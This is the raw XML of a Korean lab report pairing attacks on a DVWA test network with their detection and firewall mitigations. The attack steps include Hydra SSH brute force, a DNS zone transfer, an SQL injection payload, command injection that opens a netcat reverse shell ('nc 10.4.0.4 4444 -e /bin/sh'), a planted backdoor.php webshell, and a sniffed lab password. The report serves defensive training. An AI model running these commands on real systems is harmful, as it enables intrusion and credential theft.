            <w:tcW w:w="249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714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5.1-2.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4252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9360" w:type="dxa"/>
              <w:tblBorders>
                <w:top w:val="single" w:color="000000" w:sz="7"/>
                <w:left w:val="single" w:color="000000" w:sz="7"/>
                <w:bottom w:val="single" w:color="000000" w:sz="7"/>
                <w:right w:val="single" w:color="000000" w:sz="7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680"/>
              <w:gridCol w:w="4680"/>
            </w:tblGrid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838450" cy="1282700"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="14" name="그림 %d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4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12827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838450" cy="1054100"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="15" name="그림 %d 15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5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10541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sz w:val="20"/>
                    </w:rPr>
                    <w:t>직원이 록키서버에서 웹서버 ftp를 접속함</w:t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sz w:val="20"/>
                    </w:rPr>
                    <w:t>와이어샤크를 보던중 ftp 접속한 패킷을 발견!</w:t>
                  </w:r>
                </w:p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맑은 고딕"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve">-&gt; </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕"/>
                      <w:b/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>ID, Password 탈취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5.1-3. 시나리오1 상세( Nmap 스캔(SSH 서비스 식별))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7026"/>
      </w:tblGrid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포트 존재/버전 수집(정찰)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패킷+auth.log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Wireshark: tcp.flags.syn == 1로그: 사용자·비번 실패/세션 생성 없음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nmap -sV -p 22 10.4.0.3 수행 흔적이 auth.log에 기록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관리망만 SSH 허용 및 스캔 차단(iptables recent) 적용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공격/검증 명령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nmap -sV -p 22 10.4.0.3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/var/log/auth.log (또는 /var/log/secure)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[SSHD]</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>PermitRootLogin no</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>PasswordAuthentication no</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>PubkeyAuthentication yes</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>[UFW]</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>ufw allow from &lt;관리망IP&gt; to any port 22 proto tcp</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>ufw deny 22</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>[iptables]</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>iptables -A INPUT -p tcp --dport 22 -m recent --name SCAN --set</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>iptables -A INPUT -p tcp --dport 22 -m recent --name SCAN --update --seconds 10 --hitcount 10 -j DROP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5.1-3.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3686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9360" w:type="dxa"/>
              <w:tblBorders>
                <w:top w:val="single" w:color="000000" w:sz="7"/>
                <w:left w:val="single" w:color="000000" w:sz="7"/>
                <w:bottom w:val="single" w:color="000000" w:sz="7"/>
                <w:right w:val="single" w:color="000000" w:sz="7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680"/>
              <w:gridCol w:w="4680"/>
            </w:tblGrid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838450" cy="1485900"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="16" name="그림 %d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6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14859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1927479" cy="1481201"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="17" name="그림 %d 17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7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7479" cy="1481201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b/>
                    </w:rPr>
                    <w:t>nmap -sV -p 22 10.4.0.3</w:t>
                  </w:r>
                </w:p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Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
                    </w:rPr>
                    <w:t># 록키의 SSH 포트가 열려있는지 확인</w:t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Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
                      <w:b/>
                    </w:rPr>
                    <w:t>test.txt 파일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5.1-4. 시나리오1 상세( SSH Brute Force(Hydra))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7026"/>
      </w:tblGrid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짧은 시간 대량 인증 실패 및 MaxStartups throttling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패킷+auth.log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Wireshark: tcp.port == 22로그: 동일 IP 반복 실패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hydra -l root -P /root/test.txt 10.4.0.3 ssh 수행 시도 확인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키 기반 인증 전환 + 자동 차단(60초/5회) 적용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공격/검증 명령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hydra -l root -P /root/test.txt 10.4.0.3 ssh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/var/log/auth.log (또는 /var/log/secure)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iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --set --name SSH</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 60 --hitcount 5 --rttl --name SSH -j DROP</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>Ubuntu/Debian: iptables-save &gt; /etc/iptables/rules.v4</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>Rocky/RHEL: service iptables save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5.1-4.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4252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9360" w:type="dxa"/>
              <w:tblBorders>
                <w:top w:val="single" w:color="000000" w:sz="7"/>
                <w:left w:val="single" w:color="000000" w:sz="7"/>
                <w:bottom w:val="single" w:color="000000" w:sz="7"/>
                <w:right w:val="single" w:color="000000" w:sz="7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680"/>
              <w:gridCol w:w="4680"/>
            </w:tblGrid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838450" cy="1066800"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="18" name="그림 %d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10668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090674" cy="1648714"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="19" name="그림 %d 19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9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0674" cy="1648714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ind w:left="100"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Google Sans Text"/>
                      <w:b/>
                      <w:color w:val="1f1f1f"/>
                    </w:rPr>
                    <w:t>hydra -l root -p /root/test.txt</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="64"/>
                    <w:widowControl w:val="off"/>
                    <w:snapToGrid w:val="off"/>
                    <w:ind w:left="100"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text"/>
                      <w:color w:val="1f1f1f"/>
                    </w:rPr>
                    <w:t># root 계정 비밀번호 탈취(Brute Force)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4680" w:type="dxa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ind w:left="100"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Google Sans Text"/>
                      <w:color w:val="1f1f1f"/>
                    </w:rPr>
                    <w:t xml:space="preserve">ssh </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Google Sans Text"/>
                      <w:color w:val="0000ff"/>
                    </w:rPr>
                    <w:t>root@10.4.0.3</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="64"/>
                    <w:widowControl w:val="off"/>
                    <w:snapToGrid w:val="off"/>
                    <w:ind w:left="100"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text"/>
                      <w:color w:val="1f1f1f"/>
                    </w:rPr>
                    <w:t># 탈취한 root 계정과 비밀번호로 ssh 록키서버에 접속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5.1-5. 시나리오1 상세( DNS AXFR(Zone Transfer))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7026"/>
      </w:tblGrid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존 파일 무단 전송(정보 노출)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패킷+syslog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Wireshark: tcp.port == 53syslog: AXFR started/ended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dig axfr wj.com @172.16.18.28 수행 및 전송 로그 확인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TCP 53 제한(Secondary DNS만 허용) 정책 적용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공격/검증 명령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dig axfr wj.com @172.16.18.28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/var/log/syslog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[UFW]</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>ufw allow proto udp from any to any port 53</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>ufw deny proto tcp from any to any port 53</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>ufw allow proto tcp from &lt;SECONDARY_DNS_IP&gt; to any port 53</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>[iptables]</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>iptables -A INPUT -p udp --dport 53 -j ACCEPT</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>iptables -A INPUT -p tcp --dport 53 -j DROP</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>iptables -A INPUT -p tcp -s &lt;SECONDARY_DNS_IP&gt; --dport 53 -j ACCEPT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spacing w:line="168" w:lineRule="auto"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5.1-5.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4252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9360" w:type="dxa"/>
              <w:tblBorders>
                <w:top w:val="single" w:color="000000" w:sz="7"/>
                <w:left w:val="single" w:color="000000" w:sz="7"/>
                <w:bottom w:val="single" w:color="000000" w:sz="7"/>
                <w:right w:val="single" w:color="000000" w:sz="7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680"/>
              <w:gridCol w:w="4680"/>
            </w:tblGrid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838450" cy="622300"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="20" name="그림 %d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a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6223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105533" cy="1111631"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="21" name="그림 %d 21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b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5533" cy="1111631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153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 xml:space="preserve">/home 및 Documents 디렉터리 내의 </w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="64"/>
                    <w:widowControl w:val="off"/>
                    <w:snapToGrid w:val="off"/>
                    <w:spacing w:line="153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업무 관련 문서를 확인</w:t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spacing w:line="120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ssh로 접속하여 /etc/resolve 파일로 DNS 확인</w:t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260346" cy="1112520"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="22" name="그림 %d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c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0346" cy="111252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838450" cy="342900"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="23" name="그림 %d 23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d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3429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180" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="맑은 고딕"/>
                      <w:color w:val="1f1f1f"/>
                    </w:rPr>
                    <w:t>dig axfr wj.com @172.16.18.28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spacing w:line="180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#dig 활용하여 DNS서버의 ZONE파일 탈취</w:t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spacing w:line="180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ssh로 록키서버의 WhatWeb 설치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5.1-6. 시나리오1 상세(웹 정찰(whatweb))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7083"/>
      </w:tblGrid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기술스택/구성 정보 수집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패킷+apache access.log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Wireshark: http로그: whatweb 접근 기록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whatweb dvwa.wj.com 요청이 access.log에 기록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내부 전용 서비스일 경우 80/443 접근대역 제한 권고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공격/검증 명령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whatweb dvwa.wj.com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/var/log/apache2/dvwa_access.log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(내부 전용 서비스 전제) TRUSTED_NET만 80/443 허용 후 외부 차단</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>iptables -A INPUT -p tcp -s &lt;TRUSTED_NET&gt; --dport 80 -j ACCEPT</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>iptables -A INPUT -p tcp -s &lt;TRUSTED_NET&gt; --dport 443 -j ACCEPT</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>iptables -A INPUT -p tcp --dport 80 -j DROP</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:rPr/>
              <w:t>iptables -A INPUT -p tcp --dport 443 -j DROP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255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70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spacing w:line="216" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>그림 5.1-6.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4252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9360" w:type="dxa"/>
              <w:tblBorders>
                <w:top w:val="single" w:color="000000" w:sz="7"/>
                <w:left w:val="single" w:color="000000" w:sz="7"/>
                <w:bottom w:val="single" w:color="000000" w:sz="7"/>
                <w:right w:val="single" w:color="000000" w:sz="7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680"/>
              <w:gridCol w:w="4680"/>
            </w:tblGrid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838450" cy="508000"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="24" name="그림 %d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5080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drawing>
                      <wp:inline distT="127" distB="127" distL="0" distR="0">
                        <wp:extent cx="2652014" cy="1506982"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="25" name="그림 %d 25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8f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2014" cy="1506982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6"/>
              </w:trPr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jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="맑은 고딕"/>
                      <w:color w:val="1f1f1f"/>
                    </w:rPr>
                    <w:t>whatweb dvwa.wj.com</w:t>
                  </w:r>
                </w:p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# whatweb을 사용하여 관리자 페이지 식별</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="46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pBdr>
                      <w:top w:val="none" w:color="000000" w:sz="2" w:space="0"/>
                      <w:left w:val="none" w:color="000000" w:sz="2" w:space="0"/>
                      <w:bottom w:val="none" w:color="000000" w:sz="2" w:space="0"/>
                      <w:right w:val="none" w:color="000000" w:sz="2" w:space="0"/>
                    </w:pBdr>
                    <w:snapToGrid w:val="off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칼리서버의 DNS변경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5.1-7. 시나리오1 상세( QL Injection 시도)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6913"/>
      </w:tblGrid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시나리오1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SQL Injection 시도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요청 인자(URL/폼) 내 SQL 예약어 포함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패킷+apache access.log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Wireshark: http.request.uri로그: 특정 페이지 연속 호출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' OR '1'='1' # 등 페이로드 흔적 및 접근 패턴 확인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 xml:space="preserve">L3/L4 방화벽만으로 차단 한계 </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>→</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> WAF/애플리케이션 보완 필요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공격/검증 명령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 xml:space="preserve"> ' OR '1'='1' #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/var/log/apache2/dvwa_access.log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 xml:space="preserve">L3/L4 방화벽만으로 페이로드 차단 한계 </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>→</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> WAF/입력검증/파라미터 바인딩 등 애플리케이션 조치 필요</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="272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69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5.1-7.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4252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8820" w:type="dxa"/>
              <w:tblBorders>
                <w:top w:val="single" w:color="000000" w:sz="5"/>
                <w:left w:val="single" w:color="000000" w:sz="5"/>
                <w:bottom w:val="single" w:color="000000" w:sz="5"/>
                <w:right w:val="single" w:color="000000" w:sz="5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410"/>
              <w:gridCol w:w="4410"/>
            </w:tblGrid>
            <w:tr>
              <w:trPr>
                <w:cantSplit/>
                <w:trHeight w:val="960"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4410" w:type="dxa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after="120" w:line="273"/>
                  </w:pPr>
                  <w:r>
                    <w:drawing>
                      <wp:inline distT="127" distB="127" distL="0" distR="0">
                        <wp:extent cx="2667000" cy="1689100"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="26" name="그림 %d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0" cy="16891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410" w:type="dxa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after="120" w:line="273"/>
                  </w:pPr>
                  <w:r>
                    <w:drawing>
                      <wp:inline distT="127" distB="127" distL="0" distR="0">
                        <wp:extent cx="2667000" cy="1181100"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="27" name="그림 %d 27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0" cy="11811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960"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4410" w:type="dxa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wordWrap w:val="1"/>
                    <w:snapToGrid w:val="off"/>
                    <w:spacing w:line="273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취약서버 접속하여 SQL injection</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="64"/>
                    <w:widowControl w:val="off"/>
                    <w:wordWrap w:val="1"/>
                    <w:snapToGrid w:val="off"/>
                    <w:spacing w:line="273" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="맑은 고딕"/>
                      <w:color w:val="1f1f1f"/>
                    </w:rPr>
                    <w:t>' OR '1'='1' #</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4410" w:type="dxa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wordWrap w:val="1"/>
                    <w:snapToGrid w:val="off"/>
                    <w:spacing w:line="273" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="맑은 고딕"/>
                      <w:color w:val="1f1f1f"/>
                    </w:rPr>
                    <w:t>127.0.0.1 ; id</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="64"/>
                    <w:widowControl w:val="off"/>
                    <w:wordWrap w:val="1"/>
                    <w:snapToGrid w:val="off"/>
                    <w:spacing w:line="273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# Ping Test 페이지에서 취약점 확인</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="64"/>
                    <w:widowControl w:val="off"/>
                    <w:wordWrap w:val="1"/>
                    <w:snapToGrid w:val="off"/>
                    <w:spacing w:line="273" w:lineRule="auto"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕"/>
                      <w:color w:val="1f1f1f"/>
                    </w:rPr>
                    <w:t>-&gt; 사용자 권한 확인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5.1-8. 시나리오1 상세( Command Injection &amp; Reverse Shell)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970"/>
      </w:tblGrid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시나리오1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Command Injection &amp; Reverse Shell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/vulnerabilities/exec/ 반복 POST 및 nc 역접속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패킷+apache access.log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로그: 비정상 경로 반복/페이로드 포함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127.0.0.1; nc 10.4.0.4 4444 -e /bin/sh 시도 흔적 확인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취약 기능 접근통제/패치 + 아웃바운드 제어(egress) 및 탐지 룰 연계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공격/검증 명령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127.0.0.1; nc 10.4.0.4 4444 -e /bin/sh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/var/log/apache2/dvwa_access.log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취약 기능 제거/패치 + 아웃바운드(egress) 제어(예: 4444/tcp 차단) + 관제 룰 연계</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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69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5.1-8.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4658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tbl>
            <w:tblPr>
              <w:tblOverlap w:val="never"/>
              <w:tblW w:w="9419" w:type="dxa"/>
              <w:tblBorders>
                <w:top w:val="none" w:color="000000" w:sz="2"/>
                <w:left w:val="none" w:color="000000" w:sz="2"/>
                <w:bottom w:val="none" w:color="000000" w:sz="2"/>
                <w:right w:val="none" w:color="000000" w:sz="2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680"/>
              <w:gridCol w:w="29"/>
              <w:gridCol w:w="4709"/>
            </w:tblGrid>
            <w:tr>
              <w:trPr>
                <w:cantSplit/>
                <w:trHeight w:val="1740"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4709" w:type="dxa"/>
                  <w:gridSpan w:val="2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240" w:after="240" w:line="273"/>
                    <w:ind w:left="100"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:br/>
                  </w:r>
                  <w:r>
                    <w:drawing>
                      <wp:inline distT="127" distB="127" distL="0" distR="0">
                        <wp:extent cx="2533650" cy="1511300"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="28" name="그림 %d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650" cy="1511300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09" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:color="000000" w:sz="5"/>
                    <w:left w:val="none" w:color="000000" w:sz="2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240" w:after="240" w:line="273"/>
                    <w:ind w:left="100"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:br/>
                  </w:r>
                  <w:r>
                    <w:drawing>
                      <wp:inline distT="127" distB="127" distL="0" distR="0">
                        <wp:extent cx="2427986" cy="1204849"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="29" name="그림 %d 29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7986" cy="1204849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19"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4709" w:type="dxa"/>
                  <w:gridSpan w:val="2"/>
                  <w:tcBorders>
                    <w:top w:val="none" w:color="000000" w:sz="2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/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>127.0.0.1 ; ls -R</w:t>
                  </w:r>
                </w:p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# 디렉토리 확인 (웹 루트 및 파일 구조 파악)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4709" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="none" w:color="000000" w:sz="2"/>
                    <w:left w:val="none" w:color="000000" w:sz="2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Netcat을 활용한 리버스 쉘 페이로드가 포함된 웹쉘(Webshell)을 생성하는 공격 (공격자 칼리 IP 넣기)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr>
              <w:trPr>
                <w:cantSplit/>
                <w:trHeight w:val="690"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4680" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:color="000000" w:sz="5"/>
                    <w:left w:val="single" w:color="000000" w:sz="5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240" w:after="240" w:line="273"/>
                    <w:ind w:left="100"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:br/>
                  </w:r>
                  <w:r>
                    <w:drawing>
                      <wp:inline distT="127" distB="127" distL="0" distR="0">
                        <wp:extent cx="2719324" cy="1779397"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="30" name="그림 %d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9324" cy="1779397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39" w:type="dxa"/>
                  <w:gridSpan w:val="2"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:color="000000" w:sz="5"/>
                    <w:left w:val="none" w:color="000000" w:sz="2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240" w:after="240" w:line="273"/>
                    <w:ind w:left="100"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:br/>
                  </w:r>
                  <w:r>
                    <w:drawing>
                      <wp:inline distT="127" distB="127" distL="0" distR="0">
                        <wp:extent cx="2700274" cy="688594"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="31" name="그림 %d 31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274" cy="688594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690"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4680" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="none" w:color="000000" w:sz="2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/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>127.0.0.1 ; ls</w:t>
                  </w:r>
                </w:p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# backdoor.php 파일 생성확인</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4739" w:type="dxa"/>
                  <w:gridSpan w:val="2"/>
                  <w:tcBorders>
                    <w:top w:val="none" w:color="000000" w:sz="2"/>
                    <w:left w:val="none" w:color="000000" w:sz="2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/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>nc -lvp 4444</w:t>
                  </w:r>
                </w:p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#칼리서버에서 포트 4444 열어주기</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr>
              <w:trPr>
                <w:cantSplit/>
                <w:trHeight w:val="1410"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4680" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="none" w:color="000000" w:sz="2"/>
                    <w:left w:val="single" w:color="000000" w:sz="5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240" w:after="240" w:line="273"/>
                    <w:ind w:left="100"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:br/>
                  </w:r>
                  <w:r>
                    <w:drawing>
                      <wp:inline distT="127" distB="127" distL="0" distR="0">
                        <wp:extent cx="2719324" cy="629539"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="9906"/>
                        <wp:docPr id="32" name="그림 %d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9324" cy="629539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39" w:type="dxa"/>
                  <w:gridSpan w:val="2"/>
                  <w:tcBorders>
                    <w:top w:val="none" w:color="000000" w:sz="2"/>
                    <w:left w:val="none" w:color="000000" w:sz="2"/>
                    <w:bottom w:val="single" w:color="000000" w:sz="5"/>
                    <w:right w:val="single" w:color="000000" w:sz="5"/>
                  </w:tcBorders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before="240" w:after="240" w:line="273"/>
                    <w:ind w:left="100"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:br/>
                  </w:r>
                  <w:r>
                    <w:drawing>
                      <wp:inline distT="127" distB="127" distL="0" distR="0">
                        <wp:extent cx="2728849" cy="979805"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="33" name="그림 %d 33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sinu\AppData\Local\Temp\Hnc\BinData\EMB000061f0259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8849" cy="979805"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln w="9525" cap="sq" cmpd="sng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410"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4680" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="none" w:color="000000" w:sz="2"/>
                    <w:left w:val="single" w:color="000000" w:sz="5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URL에</w:t>
                  </w:r>
                  <w:hyperlink w:history="1" r:id="rId34">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="맑은 고딕"/>
                        <w:color w:val="1f1f1f"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t xml:space="preserve"> </w:t>
                    </w:r>
                  </w:hyperlink>
                  <w:hyperlink w:history="1" r:id="rId34">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="맑은 고딕"/>
                        <w:color w:val="800080"/>
                        <w:sz w:val="20"/>
                        <w:u w:val="single" w:color="800080"/>
                      </w:rPr>
                      <w:t>http://dvwa.wj.com/vulnerabilities/exec/backdoor.php</w:t>
                    </w:r>
                  </w:hyperlink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 xml:space="preserve"> 로 접속하면 칼리 커맨더 창에 웹서버의 서버 제어권 획득 확인 (Connect ~ 172.16.18.28)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4739" w:type="dxa"/>
                  <w:gridSpan w:val="2"/>
                  <w:tcBorders>
                    <w:top w:val="none" w:color="000000" w:sz="2"/>
                    <w:left w:val="none" w:color="000000" w:sz="2"/>
                    <w:bottom w:val="single" w:color="000000" w:sz="5"/>
                    <w:right w:val="single" w:color="000000" w:sz="5"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:fill="d9d9d9"/>
                  <w:tcMar>
                    <w:top w:w="20" w:type="dxa"/>
                    <w:left w:w="100" w:type="dxa"/>
                    <w:bottom w:w="20" w:type="dxa"/>
                    <w:right w:w="100" w:type="dxa"/>
                  </w:tcMar>
                  <w:vAlign w:val="top"/>
                </w:tcPr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/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>su wj</w:t>
                  </w:r>
                </w:p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/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>asd123!@</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="64"/>
                    <w:widowControl w:val="off"/>
                    <w:snapToGrid w:val="off"/>
                    <w:spacing w:line="273" w:lineRule="auto"/>
                    <w:ind w:left="100"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕"/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t># FTP 패킷으로 획득한 사용자 계정으로 로그인</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl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5.1-9. 시나리오1 상세( DoS(SYN Flooding))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7026"/>
      </w:tblGrid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시나리오1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DoS(SYN Flooding)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기법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커널 경고: Possible SYN flooding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데이터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kern.log/dmesg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식별 기준(필터/키워드)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TCP: Possible SYN flooding on port 80. Sending cookies.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관측 결과(요약)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커널 로그에서 SYN Flood 징후 메시지 확인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대응/후속 조치(요약)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SYN cookies/율제한/상위 장비 차단 정책 적용 검토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공격/검증 명령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핵심 로그 경로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/var/log/kern.log 또는 dmesg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차단/대응(상세)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SYN cookies/레이트리밋/상위 장비 ACL 등 단계적 적용 후 재현 테스트로 검증</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
